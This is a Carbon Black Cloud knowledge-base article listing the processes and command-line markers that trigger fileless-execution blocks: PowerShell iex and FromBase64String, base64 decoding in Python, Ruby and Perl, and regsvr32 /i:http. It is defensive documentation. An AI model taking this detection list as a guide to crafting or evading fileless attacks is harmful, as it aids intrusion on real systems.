Just Published! Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments | Download Now

Endpoint Standard: How to find events blocked by fileless execution without the ttp tag

Endpoint Standard: How to find events blocked by fileless execution without the ttp tag

Environment

  • Carbon Black Cloud Console: All Versions
  • Endpoint Standard Sensor: All Versions

Objective

Find the files that would be blocked by fileless execution without the ttp:FILELESS tag

Resolution

The following processes and commandline arguments will cause an event to be blocked as a fileless execution
ProcessCommandline Arguments
cmd.exe/k, /r, or /c
powershell.exe" \"iex\" ", " iex ", Invoke-Expression, FromBase64String, DeflateStream, -NonI, -e or -c
python.exedecode or base64
ruby.exeunpack(
perl.exedecode_base64(
regsvr32.exesct, /u, or /i:http

Additional Notes

Future work may be added to allow for more granular exclusions to allow certain scripts with these commands to execute - CBC-383

Was this article helpful? Yes No
No ratings
Article Information
Author:
Creation Date:
‎02-16-2021
Views:
429
Contributors